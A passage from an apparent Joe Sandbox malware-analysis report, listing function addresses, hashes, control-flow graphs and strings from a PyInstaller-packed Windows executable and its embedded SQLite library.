                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEAA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEB8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                                              • Opcode ID: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                                              • Instruction ID: 1feb29e050cc90f3a52991bad67bad55a5bb1109eda53b64e6c95ea64344b1f2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66624A2272819696E7198F38D4107BD77A0FB48795F445631FAAEC77C8EA3CEA45CB00
                                                                                                                                                                                                                                              Function 00007FFE01322250 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: :memory:
                                                                                                                                                                                                                                              • API String ID: 4225454184-2920599690
                                                                                                                                                                                                                                              • Opcode ID: cf44c50e47a0b3b01bdbe700d5214534733093223424063c92267072b1ad3f60
                                                                                                                                                                                                                                              • Instruction ID: b3ecb1ef08776efd224a382ae86794c467451d0bf861a4af2e37f630b5a7d18a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf44c50e47a0b3b01bdbe700d5214534733093223424063c92267072b1ad3f60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3428F72A0978286EB65AF25985037A77A0FFA5B88F054135DE4E0B7B5DF3CE494C302
                                                                                                                                                                                                                                              Function 00007FF6B7509280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction ID: e73f47549c7a00f71c569e5c0274794dc2986bf4d1ef8f373acee72fd589298e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF06823A1C74286F7608F68B4997667390AB84768F050339DBAD426E4DF3CD059CB04
                                                                                                                                                                                                                                              Function 00007FFE01311230 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                                              • Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                              • Instruction ID: 5f460c12de983cfa19a7a413722382f39d91874366dcc6ee47c881ad5d5c760d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36A1F560E0AB47C1FF588B65A8943B422F0BF55BC8F554939CA0E5E7B0EF6CE4958302
                                                                                                                                                                                                                                              Function 00007FF6B7501950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 635 7ff6b7501950-7ff6b750198b call 7ff6b75045c0 638 7ff6b7501991-7ff6b75019d1 call 7ff6b7507f90 635->638 639 7ff6b7501c4e-7ff6b7501c72 call 7ff6b750c550 635->639 644 7ff6b7501c3b-7ff6b7501c3e call 7ff6b751004c 638->644 645 7ff6b75019d7-7ff6b75019e7 call 7ff6b75106d4 638->645 649 7ff6b7501c43-7ff6b7501c4b 644->649 650 7ff6b75019e9-7ff6b7501a03 call 7ff6b7514f08 call 7ff6b7502910 645->650 651 7ff6b7501a08-7ff6b7501a24 call 7ff6b751039c 645->651 649->639 650->644 657 7ff6b7501a45-7ff6b7501a5a call 7ff6b7514f28 651->657 658 7ff6b7501a26-7ff6b7501a40 call 7ff6b7514f08 call 7ff6b7502910 651->658 665 7ff6b7501a5c-7ff6b7501a76 call 7ff6b7514f08 call 7ff6b7502910 657->665 666 7ff6b7501a7b-7ff6b7501afc call 7ff6b7501c80 * 2 call 7ff6b75106d4 657->666 658->644 665->644 677 7ff6b7501b01-7ff6b7501b14 call 7ff6b7514f44 666->677 680 7ff6b7501b35-7ff6b7501b4e call 7ff6b751039c 677->680 681 7ff6b7501b16-7ff6b7501b30 call 7ff6b7514f08 call 7ff6b7502910 677->681 686 7ff6b7501b50-7ff6b7501b6a call 7ff6b7514f08 call 7ff6b7502910 680->686 687 7ff6b7501b6f-7ff6b7501b8b call 7ff6b7510110 680->687 681->644 686->644 695 7ff6b7501b9e-7ff6b7501bac 687->695 696 7ff6b7501b8d-7ff6b7501b99 call 7ff6b7502710 687->696 695->644 697 7ff6b7501bb2-7ff6b7501bb9 695->697 696->644 700 7ff6b7501bc1-7ff6b7501bc7 697->700 702 7ff6b7501be0-7ff6b7501bef 700->702 703 7ff6b7501bc9-7ff6b7501bd6 700->703 702->702 704 7ff6b7501bf1-7ff6b7501bfa 702->704 703->704 705 7ff6b7501c0f 704->705 706 7ff6b7501bfc-7ff6b7501bff 704->706 708 7ff6b7501c11-7ff6b7501c24 705->708 706->705 707 7ff6b7501c01-7ff6b7501c04 706->707 707->705 709 7ff6b7501c06-7ff6b7501c09 707->709 710 7ff6b7501c2d-7ff6b7501c39 708->710 711 7ff6b7501c26 708->711 709->705 712 7ff6b7501c0b-7ff6b7501c0d 709->712 710->644 710->700 711->710 712->708
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7507F90: _fread_nolock.LIBCMT ref: 00007FF6B750803A
                                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF6B7501A1B
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B7501B6A), ref: 00007FF6B750295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                              • Opcode ID: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
                                                                                                                                                                                                                                              • Instruction ID: 5c34680bb581b6037308d45a95421ba431b8b308b1ce436240f7b5630e3438f5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC816F73A0C68686EB61DB2CD0412BD23A1FF88788F444535EB8DC7BA5EE3CE5858741
                                                                                                                                                                                                                                              Function 00007FF6B7501470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
                                                                                                                                                                                                                                              • Instruction ID: 45ed98669c2f5c538919f4ea6eed95d4527243c82f7e3c2e27c677da55cbe8a0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D418023A0C65286EB10DF2994415B963A0FF44798F444936EF4D8BBB5EE3CE542CB01
                                                                                                                                                                                                                                              Function 00007FFE013843D0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1044 7ffe013843d0-7ffe01384494 call 7ffe013840d0 1047 7ffe0138449a-7ffe013844b8 1044->1047 1048 7ffe01384846-7ffe01384849 1044->1048 1051 7ffe013844d2-7ffe013844d6 1047->1051 1052 7ffe013844ba-7ffe013844cd 1047->1052 1049 7ffe01384853-7ffe01384856 call 7ffe01306c40 1048->1049 1050 7ffe0138484b-7ffe01384851 1048->1050 1055 7ffe0138485b-7ffe01384861 call 7ffe01361280 1049->1055 1050->1049 1050->1055 1053 7ffe013844d8-7ffe013844df 1051->1053 1054 7ffe013844e6-7ffe013844f2 1051->1054 1057 7ffe0138486f-7ffe0138488e call 7ffe01432900 1052->1057 1053->1054 1058 7ffe013844e1 call 7ffe0131fef0 1053->1058 1059 7ffe013844f4-7ffe013844f8 1054->1059 1060 7ffe013844fe-7ffe01384502 1054->1060 1067 7ffe01384866-7ffe01384868 1055->1067 1058->1054 1059->1060 1064 7ffe0138457b-7ffe01384586 1059->1064 1065 7ffe01384504-7ffe01384508 1060->1065 1066 7ffe0138450a-7ffe0138450f call 7ffe01323790 1060->1066 1071 7ffe01384590-7ffe013845a7 call 7ffe0132d660 1064->1071 1065->1066 1069 7ffe01384578 1065->1069 1072 7ffe01384514-7ffe01384518 1066->1072 1067->1057 1069->1064 1077 7ffe013845a9-7ffe013845b1 1071->1077 1072->1069 1074 7ffe0138451a-7ffe01384527 call 7ffe013c2850 1072->1074 1081 7ffe0138455e-7ffe01384565 1074->1081 1082 7ffe01384529 1074->1082 1079 7ffe013845b3-7ffe013845bc 1077->1079 1080 7ffe013845be 1077->1080 1083 7ffe013845c1-7ffe013845cf 1079->1083 1080->1083 1086 7ffe0138456f-7ffe01384573 1081->1086 1087 7ffe01384567-7ffe0138456a call 7ffe01306400 1081->1087 1088 7ffe01384530-7ffe01384539 1082->1088 1084 7ffe01384685 1083->1084 1085 7ffe013845d5-7ffe013845d8 1083->1085 1091 7ffe0138468a-7ffe0138469d 1084->1091 1089 7ffe01384615-7ffe0138461b 1085->1089 1090 7ffe013845da-7ffe013845df 1085->1090 1093 7ffe01384829-7ffe01384831 1086->1093 1087->1086 1088->1088 1094 7ffe0138453b-7ffe0138454d call 7ffe01306880 1088->1094 1089->1084 1099 7ffe0138461d-7ffe01384630 call 7ffe01306880 1089->1099 1090->1089 1096 7ffe013845e1-7ffe013845f6 1090->1096 1097 7ffe013846d3-7ffe013846e6 1091->1097 1098 7ffe0138469f-7ffe013846a4 1091->1098 1100 7ffe01384833-7ffe01384837 1093->1100 1101 7ffe0138483e-7ffe01384844 1093->1101 1094->1081 1112 7ffe0138454f-7ffe01384559 00007FFE1A463010 1094->1112 1104 7ffe0138460b-7ffe01384613 call 7ffe0136a830 1096->1104 1105 7ffe013845f8-7ffe013845fb 1096->1105 1109 7ffe013846ec-7ffe013846f4 1097->1109 1110 7ffe013846e8 1097->1110 1106 7ffe013846b6-7ffe013846bd 1098->1106 1107 7ffe013846a6-7ffe013846ab 1098->1107 1126 7ffe01384632-7ffe01384663 1099->1126 1127 7ffe01384666-7ffe0138466d 1099->1127 1100->1101 1102 7ffe01384839 call 7ffe0131fec0 1100->1102 1101->1048 1101->1067 1102->1101 1104->1091 1105->1104 1113 7ffe013845fd-7ffe013845ff 1105->1113 1117 7ffe013846c0-7ffe013846ce call 7ffe01322e50 1106->1117 1114 7ffe013846b4 1107->1114 1115 7ffe013846ad-7ffe013846b2 1107->1115 1119 7ffe0138473c-7ffe0138473e 1109->1119 1120 7ffe013846f6-7ffe01384709 call 7ffe01306880 1109->1120 1110->1109 1112->1081 1113->1104 1121 7ffe01384601-7ffe01384606 1113->1121 1114->1106 1115->1117 1117->1097 1122 7ffe01384740-7ffe01384744 1119->1122 1123 7ffe0138474b-7ffe013847b9 call 7ffe01309170 call 7ffe0137cf30 1119->1123 1136 7ffe01384722-7ffe01384729 1120->1136 1137 7ffe0138470b-7ffe0138471d 1120->1137 1130 7ffe0138481a-7ffe0138481e 1121->1130 1122->1123 1131 7ffe01384746 1122->1131 1146 7ffe013847bb-7ffe013847c1 call 7ffe01306400 1123->1146 1147 7ffe013847c6-7ffe013847c8 1123->1147 1126->1127 1133 7ffe0138466f-7ffe01384672 call 7ffe01306400 1127->1133 1134 7ffe01384677-7ffe01384680 1127->1134 1130->1093 1139 7ffe01384820-7ffe01384824 call 7ffe01324b80 1130->1139 1131->1123 1133->1134 1134->1130 1140 7ffe01384733-7ffe01384737 1136->1140 1141 7ffe0138472b-7ffe0138472e call 7ffe01306400 1136->1141 1137->1136 1139->1093 1140->1130 1141->1140 1146->1147 1148 7ffe013847d5-7ffe013847d9 1147->1148 1149 7ffe013847ca-7ffe013847d0 call 7ffe0135e490 1147->1149 1152 7ffe013847f2-7ffe013847f4 1148->1152 1153 7ffe013847db-7ffe013847f0 call 7ffe01361310 1148->1153 1149->1148 1155 7ffe01384805-7ffe01384815 1152->1155 1156 7ffe013847f6-7ffe013847fe 1152->1156 1153->1130 1155->1130 1156->1130 1158 7ffe01384800-7ffe01384803 1156->1158 1158->1130 1158->1155
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                              • API String ID: 4225454184-879093740
                                                                                                                                                                                                                                              • Opcode ID: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
                                                                                                                                                                                                                                              • Instruction ID: 0f8b4ba066deafb73fae340496e1f1a607435f1e919cf5ebe93cce073d2f25b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAE1BB62E08B928AFB10CB6581403BD6BA5FB55B98F064235DE4D1BBB5DF3CE852C340
                                                                                                                                                                                                                                              Function 00007FF6B7501210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1159 7ff6b7501210-7ff6b750126d call 7ff6b750bd80 1162 7ff6b750126f-7ff6b7501296 call 7ff6b7502710 1159->1162 1163 7ff6b7501297-7ff6b75012af call 7ff6b7514f44 1159->1163 1168 7ff6b75012d4-7ff6b75012e4 call 7ff6b7514f44 1163->1168 1169 7ff6b75012b1-7ff6b75012cf call 7ff6b7514f08 call 7ff6b7502910 1163->1169 1175 7ff6b7501309-7ff6b750131b 1168->1175 1176 7ff6b75012e6-7ff6b7501304 call 7ff6b7514f08 call 7ff6b7502910 1168->1176 1180 7ff6b7501439-7ff6b750146d call 7ff6b750ba60 call 7ff6b7514f30 * 2 1169->1180 1179 7ff6b7501320-7ff6b7501345 call 7ff6b751039c 1175->1179 1176->1180 1186 7ff6b7501431 1179->1186 1187 7ff6b750134b-7ff6b7501355 call 7ff6b7510110 1179->1187 1186->1180 1187->1186 1195 7ff6b750135b-7ff6b7501367 1187->1195 1197 7ff6b7501370-7ff6b7501398 call 7ff6b750a1c0 1195->1197 1200 7ff6b750139a-7ff6b750139d 1197->1200 1201 7ff6b7501416-7ff6b750142c call 7ff6b7502710 1197->1201 1202 7ff6b7501411 1200->1202 1203 7ff6b750139f-7ff6b75013a9 1200->1203 1201->1186 1202->1201 1205 7ff6b75013d4-7ff6b75013d7 1203->1205 1206 7ff6b75013ab-7ff6b75013b9 call 7ff6b7510adc 1203->1206 1207 7ff6b75013ea-7ff6b75013ef 1205->1207 1208 7ff6b75013d9-7ff6b75013e7 call 7ff6b7529e30 1205->1208 1212 7ff6b75013be-7ff6b75013c1 1206->1212 1207->1197 1211 7ff6b75013f5-7ff6b75013f8 1207->1211 1208->1207 1214 7ff6b750140c-7ff6b750140f 1211->1214 1215 7ff6b75013fa-7ff6b75013fd 1211->1215 1216 7ff6b75013c3-7ff6b75013cd call 7ff6b7510110 1212->1216 1217 7ff6b75013cf-7ff6b75013d2 1212->1217 1214->1186 1215->1201 1218 7ff6b75013ff-7ff6b7501407 1215->1218 1216->1207 1216->1217 1217->1201 1218->1179
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                              • Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                              • Instruction ID: 7f9a54e1071fe5532483c2daa4c48b6f1c9070b51bd920409945892258ffb7f6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA51B123A0C68685EA61AB1AA4403BE6391FF84798F484135EF4DC7BF5EE3CE546C700
                                                                                                                                                                                                                                              Function 00007FF6B75036B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6B7503804), ref: 00007FF6B75036E1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B7503804), ref: 00007FF6B75036EB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502C9E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502D63
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: MessageBoxW.USER32 ref: 00007FF6B7502D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
